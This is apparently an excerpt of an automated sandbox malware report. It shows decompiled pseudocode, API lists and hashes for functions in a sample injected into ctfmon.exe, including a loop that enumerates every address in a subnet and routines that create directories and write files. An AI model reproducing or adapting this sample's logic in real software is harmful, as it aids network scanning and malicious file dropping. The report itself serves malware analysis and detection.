                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Sleep$gethostbynamegethostname
                                                • String ID: %d.%d.%d.*$/LU5/
                                                • API String ID: 3714389383-1555885800
                                                • Opcode ID: b668135e008c76a3d051023d8fadb003a9f389f0de56b1db322d9edc625c968b
                                                • Instruction ID: dfadb4d295061ca3ae512c075524f1d0b212be8952099cdd5b9a6c254085ea13
                                                • Opcode Fuzzy Hash: b668135e008c76a3d051023d8fadb003a9f389f0de56b1db322d9edc625c968b
                                                • Instruction Fuzzy Hash: 635102708082589FDB21DFA4CC94BFEBBB8FF05308F144599E459AB291DB74AA44CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096B4E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 106COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 500 96b4e0-96b4f8 501 96b646-96b654 call 970a5d 500->501 502 96b4fe-96b501 500->502 502->501 504 96b507-96b519 EnterCriticalSection 502->504 506 96b520-96b524 504->506 507 96b526-96b52c 506->507 508 96b532-96b57b call 965180 506->508 507->508 509 96b62c-96b633 507->509 513 96b57d-96b580 508->513 514 96b5da-96b5dc call 970a6e 508->514 509->506 512 96b639-96b645 LeaveCriticalSection 509->512 512->501 513->509 515 96b586-96b5c2 call 970a6e call 975c70 call 966f70 513->515 518 96b5e1-96b616 call 975c70 call 966f70 514->518 515->509 529 96b5c4-96b5d8 515->529 518->509 527 96b618-96b626 518->527 527->509 529->509
                                                C-Code - Quality: 76%
                                                			E0096B4E0(void* __ebx, signed char* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v9;
				short _v11;
				char _v15;
				char _v40;
				char _v41;
				intOrPtr _v48;
				void* __esi;
				signed int _t28;
				intOrPtr _t37;
				intOrPtr _t38;
				signed char* _t51;
				intOrPtr _t61;
				intOrPtr _t63;
				signed int _t64;
				void* _t65;

				_t28 =  *0x98f008; // 0x35554c2f
				_v8 = _t28 ^ _t64;
				_t51 = __ecx;
				_v41 = __edx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0x7f) {
					L13:
					return E00970A5D(_v8 ^ _t64, _t63);
				} else {
					_push(_t63);
					EnterCriticalSection(0x996a74);
					_t61 = 1;
					do {
						if(_v41 == 0 || _t61 != (_t51[3] & 0x000000ff)) {
							asm("xorps xmm0, xmm0");
							_push(_t61);
							_push(_t51[2] & 0x000000ff);
							_push(_t51[1] & 0x000000ff);
							_v40 = 0;
							asm("movups [ebp-0x23], xmm0");
							_v15 = 0;
							asm("movq [ebp-0x13], xmm0");
							_v11 = 0;
							_v9 = 0;
							E00965180( &_v40, 0x20, "%d.%d.%d.%d",  *_t51 & 0x000000ff);
							_t65 = _t65 + 0x1c;
							_t37 = _a4;
							if(_t37 == 0) {
								_t38 = E00970A6E(_t63, __eflags, 0x2c); // executed
								_t63 = _t38;
								_v48 = _t63;
								E00975C70(_t63, 0x20,  &_v40);
								_t65 = _t65 + 0x10;
								 *((intOrPtr*)(_t63 + 0x20)) = 0;
								 *((intOrPtr*)(_t63 + 0x24)) = 0;
								 *((intOrPtr*)(_t63 + 0x28)) = 0;
								__eflags = E00966F70(0x995c48);
								if(__eflags != 0) {
									 *((intOrPtr*)( *0x995c64 +  *0x995c68 * 4)) = _t63;
									 *0x995c68 =  *0x995c68 + 1;
									__eflags =  *0x995c68;
								}
							} else {
								_t71 = _t37 == 1;
								if(_t37 == 1) {
									_t63 = E00970A6E(_t63, _t71, 0x2c);
									_v48 = _t63;
									E00975C70(_t63, 0x20,  &_v40);
									_t65 = _t65 + 0x10;
									 *((intOrPtr*)(_t63 + 0x20)) = 0;
									 *((intOrPtr*)(_t63 + 0x24)) = 0;
									 *((intOrPtr*)(_t63 + 0x28)) = 1;
									if(E00966F70(0x995c20) != 0) {
										 *((intOrPtr*)( *0x995c3c +  *0x995c40 * 4)) = _t63;
										 *0x995c40 =  *0x995c40 + 1;
									}
								}
							}
						}
						_t61 = _t61 + 1;
					} while (_t61 <= 0xff);
					LeaveCriticalSection(0x996a74);
					_pop(_t63);
					goto L13;
				}
			}



















                                                0x0096b4e6
                                                0x0096b4ed
                                                0x0096b4f1
                                                0x0096b4f3
                                                0x0096b4f8
                                                0x0096b646
                                                0x0096b654
                                                0x0096b507
                                                0x0096b507
                                                0x0096b50e
                                                0x0096b514
                                                0x0096b520
                                                0x0096b524
                                                0x0096b536
                                                0x0096b539
                                                0x0096b53a
                                                0x0096b53f
                                                0x0096b54c
                                                0x0096b553
                                                0x0096b557
                                                0x0096b55e
                                                0x0096b563
                                                0x0096b569
                                                0x0096b56d
                                                0x0096b575
                                                0x0096b578
                                                0x0096b57b
                                                0x0096b5dc
                                                0x0096b5e1
                                                0x0096b5ea
                                                0x0096b5ed
                                                0x0096b5f2
                                                0x0096b5f5
                                                0x0096b601
                                                0x0096b608
                                                0x0096b614
                                                0x0096b616
                                                0x0096b623
                                                0x0096b626
                                                0x0096b626
                                                0x0096b626
                                                0x0096b57d
                                                0x0096b57d
                                                0x0096b580
                                                0x0096b58d
                                                0x0096b596
                                                0x0096b599
                                                0x0096b59e
                                                0x0096b5a1
                                                0x0096b5ad
                                                0x0096b5b4
                                                0x0096b5c2
                                                0x0096b5cf
                                                0x0096b5d2
                                                0x0096b5d2
                                                0x0096b5c2
                                                0x0096b580
                                                0x0096b57b
                                                0x0096b62c
                                                0x0096b62d
                                                0x0096b63e
                                                0x0096b645
                                                0x00000000
                                                0x0096b645

                                                APIs
                                                • EnterCriticalSection.KERNEL32(00996A74,00000000,00000000,?,?,?,?,?,?,?,00967D9D,00000000,00000000,00000000,00000001), ref: 0096B50E
                                                • new.LIBCMT ref: 0096B588
                                                • new.LIBCMT ref: 0096B5DC
                                                • LeaveCriticalSection.KERNEL32(00996A74), ref: 0096B63E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave
                                                • String ID: %d.%d.%d.%d$/LU5/
                                                • API String ID: 3168844106-734770965
                                                • Opcode ID: e717c1fe61c65f5ff367be30b391785264edf4011f5ee733d374cd0604308d33
                                                • Instruction ID: e189f073896492c888d126fb992865d8d7980e5b40be69577900ad065807c102
                                                • Opcode Fuzzy Hash: e717c1fe61c65f5ff367be30b391785264edf4011f5ee733d374cd0604308d33
                                                • Instruction Fuzzy Hash: AF412971D047049BE721DF68D845BBF7BF8EF4A300F050199F885AB282E7759944DBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096FB00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 83%
                                                			E0096FB00(CHAR* __ecx, void* __edx) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				char _v268;
				char _v271;
				char _v272;
				char _v528;
				char _v532;
				struct _FILETIME _v548;
				struct _FILETIME _v556;
				struct _FILETIME _v564;
				long _v568;
				char _v832;
				char _v833;
				struct _OVERLAPPED* _v840;
				long _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t91;
				void _t93;
				void _t95;
				void _t96;
				char _t103;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed int _t113;
				char _t114;
				void* _t116;
				signed int _t124;
				void* _t130;
				long _t133;
				signed int _t143;
				void* _t144;
				signed int _t153;
				signed int _t158;
				signed int _t160;
				long _t166;
				void* _t169;
				signed int _t171;
				char _t172;
				signed int _t173;
				void* _t175;
				void* _t183;
				signed int _t185;
				void* _t191;
				intOrPtr _t192;
				char _t194;
				signed int* _t195;
				signed int _t198;
				signed int* _t206;
				char _t218;
				void* _t226;
				void* _t228;
				void* _t234;
				signed int* _t235;
				signed int _t236;
				CHAR* _t243;
				void* _t244;
				void* _t245;
				signed int _t247;
				signed int* _t248;
				long _t250;
				void* _t251;
				void* _t252;
				void* _t253;
				signed int _t254;
				signed int _t256;
				signed int _t258;
				signed int _t263;
				signed int _t264;
				void* _t268;
				void* _t270;

				_t217 = __edx;
				_t256 = _t263;
				_t264 = _t263 - 0x20c;
				_t91 =  *0x98f008; // 0x35554c2f
				_v8 = _t91 ^ _t256;
				_t243 = __ecx;
				_t169 = __edx;
				if(__ecx != 0) {
					_t166 = GetFileAttributesA(__ecx); // executed
					if(_t166 == 0xffffffff) {
						CreateDirectoryA(_t243, 0);
					}
				}
				_t93 =  *_t169;
				if(_t93 == 0) {
					L21:
					_pop(_t244);
					return E00970A5D(_v8 ^ _t256, _t244);
				} else {
					_t226 = _t169;
					_t183 = _t169;
					do {
						if(_t93 == 0x2f || _t93 == 0x5c) {
							_t226 = _t183;
						}
						_t93 =  *(_t183 + 1);
						_t183 = _t183 + 1;
					} while (_t93 != 0);
					if(_t226 == _t169) {
						L12:
						_v268 = 0;
						if(_t243 != 0) {
							_t191 =  &_v268 - _t243;
							do {
								_t103 =  *_t243;
								_t243 =  &(_t243[1]);
								 *((char*)(_t191 + _t243 - 1)) = _t103;
							} while (_t103 != 0);
						}
						_t245 = _t169;
						do {
							_t95 =  *_t169;
							_t169 = _t169 + 1;
						} while (_t95 != 0);
						_t171 = _t169 - _t245;
						_t228 =  &_v268 - 1;
						do {
							_t96 =  *(_t228 + 1);
							_t228 = _t228 + 1;
						} while (_t96 != 0);
						_t185 = _t171 >> 2;
						memcpy(_t228, _t245, _t185 << 2);
						if(GetFileAttributesA(memcpy(_t245 + _t185 + _t185, _t245, _t171 & 0x00000003)) == 0xffffffff) {
							CreateDirectoryA( &_v268, 0);
						}
						goto L21;
					} else {
						_t234 = _t226 - _t169;
						E00983DB0( &_v528, _t169, _t234);
						_t264 = _t264 + 0xc;
						if(_t234 >= 0x104) {
							E00970E90();
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t256);
							_t258 = _t264;
							_t268 = _t264 - 0x344;
							_t107 =  *0x98f008; // 0x35554c2f
							_v548.dwLowDateTime = _t107 ^ _t258;
							_push(_t169);
							_t172 = _v532;
							_push(_t234);
							_t235 = _t183;
							__eflags = _t235[1] - 0xffffffff;
							if(_t235[1] != 0xffffffff) {
								E0096F2D0( *_t235, _t217);
							}
							_t109 =  *_t235;
							_t192 = _v0;
							_t235[1] = 0xffffffff;
							__eflags = _t192 -  *((intOrPtr*)(_t109 + 4));
							if(_t192 <  *((intOrPtr*)(_t109 + 4))) {
								__eflags = _t192 -  *((intOrPtr*)(_t109 + 0x10));
								if(_t192 <  *((intOrPtr*)(_t109 + 0x10))) {
									E0096EC60(_t109);
									_t192 = _v0;
								}
								_t110 =  *_t235;
								_push(_t243);
								__eflags =  *((intOrPtr*)(_t110 + 0x10)) - _t192;
								if( *((intOrPtr*)(_t110 + 0x10)) < _t192) {
									do {
										_t254 =  *_t235;
										__eflags = _t254;
										if(_t254 != 0) {
											__eflags =  *(_t254 + 0x18);
											if( *(_t254 + 0x18) != 0) {
												_t217 =  *((intOrPtr*)(_t254 + 0x10)) + 1;
												__eflags = _t217 -  *((intOrPtr*)(_t254 + 4));
												if(_t217 !=  *((intOrPtr*)(_t254 + 4))) {
													 *((intOrPtr*)(_t254 + 0x10)) = _t217;
													 *((intOrPtr*)(_t254 + 0x14)) =  *((intOrPtr*)(_t254 + 0x14)) +  *((intOrPtr*)(_t254 + 0x48)) + 0x2e +  *((intOrPtr*)(_t254 + 0x50)) +  *((intOrPtr*)(_t254 + 0x4c));
													_t37 = _t254 + 0x28; // 0x28
													_t217 = _t37;
													_t38 = _t254 + 0x78; // 0x78
													_t158 = E0096E7C0(_t254, _t37, _t38, 0, 0);
													_t192 = _v0;
													_t268 = _t268 - 0x10 + 0x1c;
													asm("sbb eax, eax");
													_t160 =  ~_t158 + 1;
													__eflags = _t160;
													 *(_t254 + 0x18) = _t160;
												}
											}
										}
										_t153 =  *_t235;
										__eflags =  *((intOrPtr*)(_t153 + 0x10)) - _t192;
									} while ( *((intOrPtr*)(_t153 + 0x10)) < _t192);
								}
								E0096F4E0(_t172, _t235, _t217, _t235, _t192,  &_v832);
								__eflags = _v568 & 0x00000010;
								_t113 =  *_t172;
								if((_v568 & 0x00000010) == 0) {
									_t218 = _t172;
									_t194 = _t172;
									__eflags = _t113;
									while(_t113 != 0) {
										__eflags = _t113 - 0x2f;
										if(_t113 == 0x2f) {
											L46:
											_t49 = _t194 + 1; // 0x965105
											_t218 = _t49;
										} else {
											__eflags = _t113 - 0x5c;
											if(_t113 == 0x5c) {
												goto L46;
											}
										}
										_t50 = _t194 + 1; // 0x996a4c
										_t113 =  *_t50;
										_t194 = _t194 + 1;
										__eflags = _t113;
									}
									_t195 = _t172;
									_t247 =  &_v272 - _t172;
									__eflags = _t247;
									do {
										_t114 =  *_t195;
										_t52 =  &(_t195[0]); // 0x996a4c
										_t195 = _t52;
										 *((char*)(_t247 + _t195 - 1)) = _t114;
										__eflags = _t114;
									} while (_t114 != 0);
									__eflags = _t218 - _t172;
									if(_t218 != _t172) {
										_t116 = _t218 - _t172;
										__eflags = _t116 - 0x104;
										if(_t116 >= 0x104) {
											E00970E90();
											asm("int3");
											asm("int3");
											asm("int3");
											_push(_t247);
											_t248 = _t195;
											_push(_t235);
											__eflags = _t248[1] - 0xffffffff;
											if(_t248[1] != 0xffffffff) {
												E0096F2D0( *_t248, _t218);
											}
											_t236 =  *_t248;
											_t248[1] = 0xffffffff;
											__eflags = _t236;
											if(_t236 != 0) {
												__eflags =  *(_t236 + 0x7c);
												if( *(_t236 + 0x7c) != 0) {
													E0096F2D0(_t236, _t218);
												}
												_push(_t172);
												_t173 =  *_t236;
												__eflags = _t173;
												if(_t173 != 0) {
													__eflags =  *((char*)(_t173 + 0x10));
													if( *((char*)(_t173 + 0x10)) != 0) {
														CloseHandle( *(_t173 + 4));
													}
													_push(0x20);
													E00970AA1(_t173);
													_t268 = _t268 + 8;
												}
												L00975A36(_t236);
											}
											__eflags = 0;
											 *_t248 = 0;
											return 0;
										} else {
											 *((char*)(_t258 + _t116 - 0x108)) = 0;
											_t124 = _v272;
											__eflags = _t124 - 0x2f;
											if(_t124 == 0x2f) {
												L58:
												wsprintfA( &_v532, "%s%s",  &_v272, _t218);
												_t270 = _t268 + 0x10;
												_t198 = 0;
												__eflags = 0;
											} else {
												__eflags = _t124 - 0x5c;
												if(_t124 == 0x5c) {
													goto L58;
												} else {
													__eflags = _t124;
													if(_t124 == 0) {
														goto L57;
													} else {
														__eflags = _v271 - 0x3a;
														if(_v271 == 0x3a) {
															goto L58;
														} else {
															goto L57;
														}
													}
												}
											}
											goto L59;
										}
									} else {
										_v272 = _t114;
										L57:
										_t247 =  &(_t235[0x50]);
										wsprintfA( &_v532, "%s%s%s", _t247,  &_v272, _t218);
										_t270 = _t268 + 0x14;
										_t198 = _t247;
										L59:
										E0096FB00(_t198,  &_v272); // executed
										_t130 = CreateFileA( &_v532, 0x40000000, 0, 0, 2, _v568, 0); // executed
										_t175 = _t130;
										__eflags = _t175 - 0xffffffff;
										if(_t175 != 0xffffffff) {
											E0096EF10( *_t235, _t235[0x4e]); // executed
											__eflags = _t235[0x4f];
											if(__eflags == 0) {
												_push(0x4000); // executed
												_t144 = E00970AB4(_t247, __eflags); // executed
												_t270 = _t270 + 4;
												_t235[0x4f] = _t144;
											}
											_v840 = 0;
											while(1) {
												_t221 = _t235[0x4f];
												_t133 = E0096F090( *_t235, _t235[0x4f], 0x4000,  &_v833); // executed
												_t250 = _t133;
												_t270 = _t270 + 8;
												__eflags = _t250 - 0xffffff96;
												if(_t250 == 0xffffff96) {
													break;
												}
												__eflags = _t250;
												if(__eflags < 0) {
													L70:
													_v840 = 0x5000000;
												} else {
													if(__eflags <= 0) {
														L68:
														__eflags = _v833;
														if(_v833 != 0) {
															SetFileTime(_t175,  &_v556,  &_v564,  &_v548); // executed
														} else {
															__eflags = _t250;
															if(_t250 != 0) {
																continue;
															} else {
																goto L70;
															}
														}
													} else {
														_t143 = WriteFile(_t175, _t235[0x4f], _t250,  &_v844, 0); // executed
														__eflags = _t143;
														if(_t143 == 0) {
															_v840 = 0x400;
														} else {
															goto L68;
														}
													}
												}
												L74:
												FindCloseChangeNotification(_t175); // executed
												E0096F2D0( *_t235, _t221);
												__eflags = _v12 ^ _t258;
												_pop(_t251);
												return E00970A5D(_v12 ^ _t258, _t251);
												goto L87;
											}
											_v840 = 0x1000;
											goto L74;
										} else {
											_pop(_t252);
											__eflags = _v12 ^ _t258;
											return E00970A5D(_v12 ^ _t258, _t252);
										}
									}
								} else {
									__eflags = _t113 - 0x2f;
									if(_t113 == 0x2f) {
										L41:
										_t206 = 0;
										__eflags = 0;
									} else {
										__eflags = _t113 - 0x5c;
										if(_t113 == 0x5c) {
											goto L41;
										} else {
											__eflags = _t113;
											if(_t113 == 0) {
												L40:
												_t206 =  &(_t235[0x50]);
											} else {
												__eflags =  *((char*)(_t172 + 1)) - 0x3a;
												if( *((char*)(_t172 + 1)) == 0x3a) {
													goto L41;
												} else {
													goto L40;
												}
											}
										}
									}
									E0096FB00(_t206, _t172);
									_pop(_t253);
									__eflags = _v12 ^ _t258;
									return E00970A5D(_v12 ^ _t258, _t253);
								}
							} else {
								__eflags = _v12 ^ _t258;
								return E00970A5D(_v12 ^ _t258, _t243);
							}
						} else {
							 *((char*)(_t256 + _t234 - 0x20c)) = 0;
							E0096FB00(_t243,  &_v528);
							goto L12;
						}
					}
				}
				L87:
			}













































































                                                0x0096fb00
                                                0x0096fb01
                                                0x0096fb03
                                                0x0096fb09
                                                0x0096fb10
                                                0x0096fb15
                                                0x0096fb17
                                                0x0096fb1b
                                                0x0096fb1e
                                                0x0096fb27
                                                0x0096fb2c
                                                0x0096fb2c
                                                0x0096fb27
                                                0x0096fb32
                                                0x0096fb36
                                                0x0096fbf8
                                                0x0096fbfb
                                                0x0096fc07
                                                0x0096fb3c
                                                0x0096fb3d
                                                0x0096fb3f
                                                0x0096fb41
                                                0x0096fb43
                                                0x0096fb49
                                                0x0096fb49
                                                0x0096fb4b
                                                0x0096fb4e
                                                0x0096fb4f
                                                0x0096fb55
                                                0x0096fb8b
                                                0x0096fb8b
                                                0x0096fb94
                                                0x0096fb9c
                                                0x0096fba0
                                                0x0096fba0
                                                0x0096fba2
                                                0x0096fba5
                                                0x0096fba9
                                                0x0096fba0
                                                0x0096fbad
                                                0x0096fbb0
                                                0x0096fbb0
                                                0x0096fbb2
                                                0x0096fbb3
                                                0x0096fbbd
                                                0x0096fbbf
                                                0x0096fbc0
                                                0x0096fbc0
                                                0x0096fbc3
                                                0x0096fbc4
                                                0x0096fbd0
                                                0x0096fbd3
                                                0x0096fbe7
                                                0x0096fbf2
                                                0x0096fbf2
                                                0x00000000
                                                0x0096fb57
                                                0x0096fb57
                                                0x0096fb62
                                                0x0096fb67
                                                0x0096fb70
                                                0x0096fc08
                                                0x0096fc0d
                                                0x0096fc0e
                                                0x0096fc0f
                                                0x0096fc10
                                                0x0096fc11
                                                0x0096fc13
                                                0x0096fc19
                                                0x0096fc20
                                                0x0096fc23
                                                0x0096fc24
                                                0x0096fc27
                                                0x0096fc28
                                                0x0096fc2a
                                                0x0096fc2e
                                                0x0096fc32
                                                0x0096fc32
                                                0x0096fc37
                                                0x0096fc39
                                                0x0096fc3c
                                                0x0096fc43
                                                0x0096fc46
                                                0x0096fc5f
                                                0x0096fc62
                                                0x0096fc66
                                                0x0096fc6b
                                                0x0096fc6b
                                                0x0096fc6e
                                                0x0096fc70
                                                0x0096fc71
                                                0x0096fc74
                                                0x0096fc76
                                                0x0096fc76
                                                0x0096fc78
                                                0x0096fc7a
                                                0x0096fc7c
                                                0x0096fc80
                                                0x0096fc85
                                                0x0096fc86
                                                0x0096fc89
                                                0x0096fc9c
                                                0x0096fc9f
                                                0x0096fca2
                                                0x0096fca2
                                                0x0096fca7
                                                0x0096fcaf
                                                0x0096fcb4
                                                0x0096fcb7
                                                0x0096fcbc
                                                0x0096fcbe
                                                0x0096fcbe
                                                0x0096fcbf
                                                0x0096fcbf
                                                0x0096fc89
                                                0x0096fc80
                                                0x0096fcc2
                                                0x0096fcc4
                                                0x0096fcc4
                                                0x0096fc76
                                                0x0096fcd3
                                                0x0096fcd8
                                                0x0096fcdf
                                                0x0096fce1
                                                0x0096fd1b
                                                0x0096fd1d
                                                0x0096fd1f
                                                0x0096fd21
                                                0x0096fd23
                                                0x0096fd25
                                                0x0096fd2b
                                                0x0096fd2b
                                                0x0096fd2b
                                                0x0096fd27
                                                0x0096fd27
                                                0x0096fd29
                                                0x00000000
                                                0x00000000
                                                0x0096fd29
                                                0x0096fd2e
                                                0x0096fd2e
                                                0x0096fd31
                                                0x0096fd32
                                                0x0096fd32
                                                0x0096fd3c
                                                0x0096fd3e
                                                0x0096fd3e
                                                0x0096fd40
                                                0x0096fd40
                                                0x0096fd42
                                                0x0096fd42
                                                0x0096fd45
                                                0x0096fd49
                                                0x0096fd49
                                                0x0096fd4d
                                                0x0096fd4f
                                                0x0096fd5b
                                                0x0096fd5d
                                                0x0096fd62
                                                0x0096ff08
                                                0x0096ff0d
                                                0x0096ff0e
                                                0x0096ff0f
                                                0x0096ff10
                                                0x0096ff11
                                                0x0096ff13
                                                0x0096ff14
                                                0x0096ff18
                                                0x0096ff1c
                                                0x0096ff1c
                                                0x0096ff21
                                                0x0096ff23
                                                0x0096ff2a
                                                0x0096ff2c
                                                0x0096ff2e
                                                0x0096ff32
                                                0x0096ff36
                                                0x0096ff36
                                                0x0096ff3b
                                                0x0096ff3c
                                                0x0096ff3e
                                                0x0096ff40
                                                0x0096ff42
                                                0x0096ff46
                                                0x0096ff4b
                                                0x0096ff4b
                                                0x0096ff51
                                                0x0096ff54
                                                0x0096ff59
                                                0x0096ff59
                                                0x0096ff5d
                                                0x0096ff65
                                                0x0096ff66
                                                0x0096ff69
                                                0x0096ff6c
                                                0x0096fd68
                                                0x0096fd68
                                                0x0096fd70
                                                0x0096fd76
                                                0x0096fd78
                                                0x0096fdb3
                                                0x0096fdc7
                                                0x0096fdcd
                                                0x0096fdd0
                                                0x0096fdd0
                                                0x0096fd7a
                                                0x0096fd7a
                                                0x0096fd7c
                                                0x00000000
                                                0x0096fd7e
                                                0x0096fd7e
                                                0x0096fd80
                                                0x00000000
                                                0x0096fd82
                                                0x0096fd82
                                                0x0096fd89
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096fd89
                                                0x0096fd80
                                                0x0096fd7c
                                                0x00000000
                                                0x0096fd78
                                                0x0096fd51
                                                0x0096fd51
                                                0x0096fd8b
                                                0x0096fd93
                                                0x0096fda6
                                                0x0096fdac
                                                0x0096fdaf
                                                0x0096fdd2
                                                0x0096fdd8
                                                0x0096fdf7
                                                0x0096fdfd
                                                0x0096fdff
                                                0x0096fe02
                                                0x0096fe24
                                                0x0096fe29
                                                0x0096fe30
                                                0x0096fe32
                                                0x0096fe37
                                                0x0096fe3c
                                                0x0096fe3f
                                                0x0096fe3f
                                                0x0096fe45
                                                0x0096fe50
                                                0x0096fe50
                                                0x0096fe64
                                                0x0096fe69
                                                0x0096fe6b
                                                0x0096fe6e
                                                0x0096fe71
                                                0x00000000
                                                0x00000000
                                                0x0096fe73
                                                0x0096fe75
                                                0x0096fea1
                                                0x0096fea1
                                                0x0096fe77
                                                0x0096fe77
                                                0x0096fe94
                                                0x0096fe94
                                                0x0096fe9b
                                                0x0096fecf
                                                0x0096fe9d
                                                0x0096fe9d
                                                0x0096fe9f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096fe9f
                                                0x0096fe79
                                                0x0096fe8a
                                                0x0096fe90
                                                0x0096fe92
                                                0x0096fead
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096fe92
                                                0x0096fe77
                                                0x0096fee1
                                                0x0096fee2
                                                0x0096feea
                                                0x0096fef8
                                                0x0096fefa
                                                0x0096ff05
                                                0x00000000
                                                0x0096ff05
                                                0x0096fed7
                                                0x00000000
                                                0x0096fe04
                                                0x0096fe04
                                                0x0096fe0f
                                                0x0096fe19
                                                0x0096fe19
                                                0x0096fe02
                                                0x0096fce3
                                                0x0096fce3
                                                0x0096fce5
                                                0x0096fcfd
                                                0x0096fcfd
                                                0x0096fcfd
                                                0x0096fce7
                                                0x0096fce7
                                                0x0096fce9
                                                0x00000000
                                                0x0096fceb
                                                0x0096fceb
                                                0x0096fced
                                                0x0096fcf5
                                                0x0096fcf5
                                                0x0096fcef
                                                0x0096fcef
                                                0x0096fcf3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096fcf3
                                                0x0096fced
                                                0x0096fce9
                                                0x0096fd01
                                                0x0096fd06
                                                0x0096fd0e
                                                0x0096fd18
                                                0x0096fd18
                                                0x0096fc48
                                                0x0096fc52
                                                0x0096fc5c
                                                0x0096fc5c
                                                0x0096fb76
                                                0x0096fb7c
                                                0x0096fb86
                                                0x00000000
                                                0x0096fb86
                                                0x0096fb70
                                                0x0096fb55
                                                0x00000000

                                                APIs
                                                • GetFileAttributesA.KERNELBASE(00000000,?,00965104), ref: 0096FB1E
                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0096FB2C
                                                • GetFileAttributesA.KERNEL32(00000000,?,?,00965104), ref: 0096FBDD
                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0096FBF2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: AttributesCreateDirectoryFile
                                                • String ID: /LU5/
                                                • API String ID: 3401506121-937868281
                                                • Opcode ID: 1391bd0e065e506c4d51f6b219280a519d0476feb117b32588643d5ff2fa8432
                                                • Instruction ID: 66cf4ea975101f5cc6704cc2038e523089fee26980a0ccba64ded98b2cf3c994
                                                • Opcode Fuzzy Hash: 1391bd0e065e506c4d51f6b219280a519d0476feb117b32588643d5ff2fa8432
                                                • Instruction Fuzzy Hash: 2641F7365042089FCB24DF78E8B4BEDB769AF95310F1042BAE8AD97281CB715D4AD790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00967140 Relevance: 7.6, APIs: 5, Instructions: 58fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 80%
                                                			E00967140(void* __eflags, CHAR* _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _t12;
				void* _t13;
				int _t16;
				void* _t21;
				void* _t22;
				long _t24;
				void* _t26;
				void* _t29;

				_v12 = 0;
				_v8 = 0;
				_t12 = E00964AC0(_t21, _t22,  &_v12,  &_v8); // executed
				if(_t12 != 0) {
					_t24 = _v8;
					_v16 = 0;
					_t13 = CreateFileA(_a4, 0x40000000, 2, 0, 2, 0x80, 0); // executed
					_t29 = _t13;
					if(_t29 == 0) {
						L5:
						return 0; // executed
					} else {
						_t26 = _v12;
						_t16 = WriteFile(_t29, _t26, _t24,  &_v16, 0); // executed
						_push(_t29);
						if(_t16 != 0) {
							FindCloseChangeNotification(); // executed
							LocalFree(_t26); // executed
							return 1;
						} else {
							CloseHandle();
							goto L5;
						}
					}
				} else {
					return _t12;
				}
			}














                                                0x00967149
                                                0x00967154
                                                0x0096715c
                                                0x00967166
                                                0x0096716e
                                                0x00967186
                                                0x0096718d
                                                0x00967193
                                                0x00967197
                                                0x009671b6
                                                0x009671bd
                                                0x00967199
                                                0x009671a0
                                                0x009671a5
                                                0x009671ab
                                                0x009671ae
                                                0x009671be
                                                0x009671c5
                                                0x009671d2
                                                0x009671b0
                                                0x009671b0
                                                0x00000000
                                                0x009671b0
                                                0x009671ae
                                                0x0096716b
                                                0x0096716b
                                                0x0096716b

                                                APIs
                                                • CreateFileA.KERNELBASE(00000000,40000000,00000002,00000000,00000002,00000080,00000000,?,?), ref: 0096718D
                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?), ref: 009671A5
                                                • CloseHandle.KERNEL32(00000000,?,?), ref: 009671B0
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleWrite
                                                • String ID:
                                                • API String ID: 1065093856-0
                                                • Opcode ID: ae1bd4ea3cbbdb739bcbc54a0d00daadbcdc47ad27d13edeff84661e12cfcda0
                                                • Instruction ID: 59c715e1deede9dbed1294928ea7a27b9d20deb292e25002acfa7cfe91d38e8c
                                                • Opcode Fuzzy Hash: ae1bd4ea3cbbdb739bcbc54a0d00daadbcdc47ad27d13edeff84661e12cfcda0
                                                • Instruction Fuzzy Hash: 3901C835958208BBDB209FD4AC0AFEEBB7C9B46B15F114182FD04E7240D770990597E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096B3C0 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 84%
                                                			E0096B3C0(void* __ebx, void* __esi, intOrPtr _a4) {
				void* __edi;
				void* _t9;
				void* _t11;
				intOrPtr _t19;
				intOrPtr _t24;
